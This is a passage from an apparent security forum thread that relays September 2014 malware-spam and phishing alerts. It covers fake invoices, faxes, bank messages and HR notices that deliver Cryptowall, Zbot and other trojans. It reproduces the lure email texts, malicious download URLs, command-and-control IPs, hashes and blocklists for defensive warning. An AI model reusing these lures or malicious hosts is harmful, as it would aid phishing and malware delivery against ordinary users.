... the link in the message goes somewhere bad, in this case it downloads a ZIP files from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according the the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com "
* https://www.virustotal.com/en-gb/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410467960/

** http://www.dynamoo.com/files/analysis_2567_79b1f47c0dfd99f974d2920a381ad91f.pdf

*** https://www.virustotal.com/en-gb/file/5db8207e1891b01b84c987f8065c2f646cbcceae9ff5af5198a05f75766e8c39/analysis/1410468901/
___

Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo.com/2014/09/malicious-wordpress-injection-sending.html
11 Seo 2014 - "There is currently some sort of injection attack against WordPress sites that is injected code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID.ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78 "

176.58.100.98: https://www.virustotal.com/en-gb/ip-address/176.58.100.98/information/

178.62.254.78: https://www.virustotal.com/en-gb/ip-address/178.62.254.78/information/
___

Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecurity.co.uk/employees-important-address-update-fake-pdf-malware/
11 Sep 2014 - "'To All Employee’s – Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
To All Employee’s:
The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct... If changes need to be made, contact HR .. Administrator ...

11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
*https://www.virustotal.com/en/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410456657/

- http://blog.dynamoo.com/2014/09/to-all-employees-important-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From: Administrator [administrator@ victimdomain .com]
Date: 11 September 2014 22:25
Subject: To All Employee's - Important Address UPDATE
To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...

The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
___

Fake picture or video SPAM – jpg malware
- http://myonlinesecurity.co.uk/new-picture-video-message-fake-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake windows short cut file .pif Even setting show file extensions will, not show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
You have received a picture message from mobile phone number +447586595142 picture
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

... there will be hundreds of different sites. The zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same # and detection rate as the pif file earlier submitted to virus total*

11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to: IMG_00005_09112014.jpeg.pif
Current Virus total detections:4/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410430034/

** https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/
___

Fake 'new order' SPAM – PDF malware
- http://myonlinesecurity.co.uk/new-order-fake-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- windows short cut file .pif . Even setting show file extensions will -not- show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/new-order.png

11 September 2014: 2014.09.11.zip : Extracts to: 2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/

:mad::mad: :fear:

AplusWebMaster
2014-09-12, 12:08
FYI...

Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu/2014/09/12/fake-email-copie-facture-societe-lws-fc-contains-malicvious-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...

The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. the VBS script in fact is encoded to hide the real purpose but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/adf506eebd74dbdd2e23ab2a0918912a95105745226302cca32c760c34d196a5/analysis/
___

Fake Household Improvement SPAM - Zbot Malware
- https://blog.malwarebytes.org/fraud-scam/2014/09/household-improvement-emails-come-with-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/09/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot. Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**... there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecurity.co.uk/m-m-kitchen-appliances-inv211457-fake-word-doc-malware/

** https://www.virustotal.com/en/file/941434a32431048380956c6bb7c6be5fd4105ac397eb8c46011d27e827014f73/analysis/

*** http://blog.mxlab.eu/2014/09/12/fake-email-with-attached-invoice-from-broad-oak-toiletries-ltd-contains-trojan/
___

Data Breaches and PoS RAM Scrapers
- http://blog.trendmicro.com/trendlabs-security-intelligence/2014-an-explosion-of-data-breaches-and-pos-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and has open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and installs Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."

:mad: :fear:

AplusWebMaster
2014-09-15, 03:44
FYI...

Phish - Paypal ...
- http://myonlinesecurity.co.uk/paypal-account-will-limited-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever follow the links in the email...
PayPal account information :
Hello,
Dear PayPal user ,
Your account will be limited if you not confirm it .
Need Assistance?
Some information on your account appears to be missing or incorrect.
Please update your account promptly so that you can continue to enjoy
all the benefits of your PayPal account.
If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
Please Login to confirm your information :
http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
Reference Number: PP-003-211-347-423
Yours sincerely,
PayPal

This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rangeview_paypal_phishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."

:fear: :mad:

AplusWebMaster
2014-09-15, 13:13
FYI...

Fake Termination SPAM – malware
- http://myonlinesecurity.co.uk/termination-due-policy-violation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted- . NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SH1 or MD5#. Loads of slightly different subjects with this one, including
Policy violation #59892665326
Termination due to policy violation #33205939124
Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
Hello,
We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
- 0A4 44 12.09.2011
- 0A4 46 12.09.2011
- 0A4 85 12.09.2011
You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
Sincerely,
Pauletta Stephens ...

15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to: disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/eb62d2fc255b934706b15eb5fa4f07fdf3a900810820ef60db62b77de1d4c4ef/analysis/
... Behavioural information
TCP connections:
187.45.193.139: https://www.virustotal.com/en/ip-address/187.45.193.139/information/
213.186.33.87: https://www.virustotal.com/en/ip-address/213.186.33.87/information/
23.62.99.33: https://www.virustotal.com/en/ip-address/23.62.99.33/information/
66.96.147.117: https://www.virustotal.com/en/ip-address/66.96.147.117/information/
UDP communications:
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

LinkedIn feature exposes Email Addresses
- http://krebsonsecurity.com/2014/09/linkedin-feature-exposes-email-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___

Fake Overdue invoice SPAM - malicious .arj attachment
- http://blog.dynamoo.com/2014/09/overdue-invoice-6767390-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
From: Mauro Reddin
Date: 15 September 2014 10:32
Subject: Overdue invoice #6767390
Morning,
I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
Best regards,
Mauro Reddin ...

The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustotal.com/en-gb/file/c21b719a9cf4c5aa9d8927c185be4181d7c465b01fa85e38c7a3d459930e2203/analysis/1410773681/
___

Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:

Screenshot: http://4.bp.blogspot.com/-knPfcbJT0Q4/VBbJyysrTNI/AAAAAAAAFnI/YbEjR56dgRU/s1600/sage.png

... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
florensegoethe .com.br
coursstagephoto .com
vicklovesmila .com
flashsavant .com"
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/
___

Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-natwest-fake-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...

15 September 2014: SecureMessage.zip ( 8kb) : Extracts to: SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/

- http://threattrack.tumblr.com/post/97567721558/natwest-secure-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/65aed37f33dcaf8e16e0b2e828d4f53e/tumblr_inline_nby6ovZu2c1r6pupn.png
___

Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecurity.co.uk/lloyds-bank-new-secure-message-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]
(New users may need to verify their email address)
If you do not see or cannot click “Read Message” / click here
Desktop Users:
You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
Mobile Users:
Install the mobile application.
Protected by the Voltage SecureMail Cloud
SecureMail has a NEW LOOK to better support mobile devices!
Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/lloyds_bank_secure_message.png

This one wants your personal details and bank details..."
___

Fake Fax SPAM - malware attachment
- http://myonlinesecurity.co.uk/received-fax-fake-pdf-malware/
15 SEP 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a new fax. This fax was received by Fax Server.
The fax has been downloaded to dropbox service (Google Inc).
To view your fax message, please download from the link below. It’s
operated by Dropbox and safety...
Received Fax Details
Received on:1 5/09/2014 10:14 AM
Number of Pages: 1 ...

15 September 2014: Docs0972.zip ( 8kb): Extracts to: Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bec0ac2711f99f90f27a29a9e021bedfede02c139f26dcfae36e2d8895babf52/analysis/1410804563/
___

Twitch users shook by money spending malware
- http://www.theinquirer.net/inquirer/news/2367489/twitch-users-shook-by-money-spending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow the clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure.com/weblog/archives/00002742.html

:fear::fear: :mad:

AplusWebMaster
2014-09-16, 12:16
FYI...

Fake 'Payments' SPAM ...
- http://blog.mxlab.eu/2014/09/16/trojan-genvariant-graftor-155439-present-in-fake-emails-regarding-payments/
Sep 16, 2014 - "... intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done” is sent from a spoofed address and has the following body:
Dear sir,
Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
Cont. #42 EXSQI013/MAY/13 US$29,154.66
Total Remittance: US$ 51,704.97
Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
Thank you very much.
Best regards,
Me

The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/db9eb842deb7cbda56c3df7c1e198fac5f0d65d0d8ef9df2f13618d18416c686/analysis/
The second email comes with the subject “Re: Balance payment” is sent from a spoofed address and has the following body:
The attached TT copy is issued at the request of our customer. The advice is for your reference only.
Yours faithfully,
Global Payments and Cash Management
Bank of America (BOA)
This is an auto-generated email, please DO NOT REPLY. Any replies to this
email will be disregarded...

The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/f7f1b10365b995c308d1cc4a3f025e5e7f249fbfee82f7bcd8297e1c5fcc1635/analysis/
___

Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu/2014/09/16/email-my-new-photo-contains-a-variant-of-trojan-win32-swizzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
my new photo ;)
if you like my photo to send me u photo

The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 127 kB large file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/83d322707828350ba51301b1a0d02ee0c831b88bb9722036ade2b7d8827817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustotal.com/en/ip-address/131.253.40.1/information/
137.254.60.32: https://www.virustotal.com/en/ip-address/137.254.60.32/information/
134.170.188.84: https://www.virustotal.com/en/ip-address/134.170.188.84/information/
157.56.121.21: https://www.virustotal.com/en/ip-address/157.56.121.21/information/
91.240.22.62: https://www.virustotal.com/en/ip-address/91.240.22.62/information/
___

Fake USPS SPAM - word doc malware
- http://myonlinesecurity.co.uk/usps-postal-notification-service-fake-word-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/usps-postal-notification-service.png

16 September 2014: Label.zip ( 82 kb): Extracts to: Label.exe
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6678ff966e942e4bf669d8a240acbab79971c871152f3c16478a3ec0c3f5c805/analysis/1410841682/
___

Fake 'inovice' SPAM ...
- http://blog.dynamoo.com/2014/09/inovice-0293991-september-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment

The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series a DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block- .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustotal.com/en-gb/file/ee43410ecaba583a03eb3cfbf1af1afb38a5f25cd8742b47372b853d83fc7089/analysis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustotal.com/en/ip-address/208.91.197.27/information/
___

Fake FAX SPAM... again
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From: Fax
Date: 16 September 2014 11:05
Subject: You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...

The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps "
* https://www.virustotal.com/en-gb/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo.com/2014/09/kifilwe-shakong-copied-invoices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From: Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date: 16 September 2014 12:17
Subject: Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...

Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/e324d73b36f1fd31c53f6ae21457c2fd57f90be56dcd776efbe06b01fdaf3d5d/analysis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo.com/2014/09/unpaid-invoice-notification-spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
From: Christie Foley [christie.foley@ badinsky .sk]
Reply-to: Christie Foley [christie.foley@ badinsky .sk]
Date: 16 September 2014 13:55
Subject: Unpaid invoice notification ...

Screenshot: https://1.bp.blogspot.com/-4dVURai9zaE/VBg551t4f-I/AAAAAAAAFoA/l2blM5UgsbU/s1600/invoice.png

The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/report.php?id=1410873578924

- http://myonlinesecurity.co.uk/notification-amount-overdue-recent-invoice-java-exploit-malware/
16 Sep 2014
___

Fake 'PAYMENT SCHEDULE' email - 419 SCAM
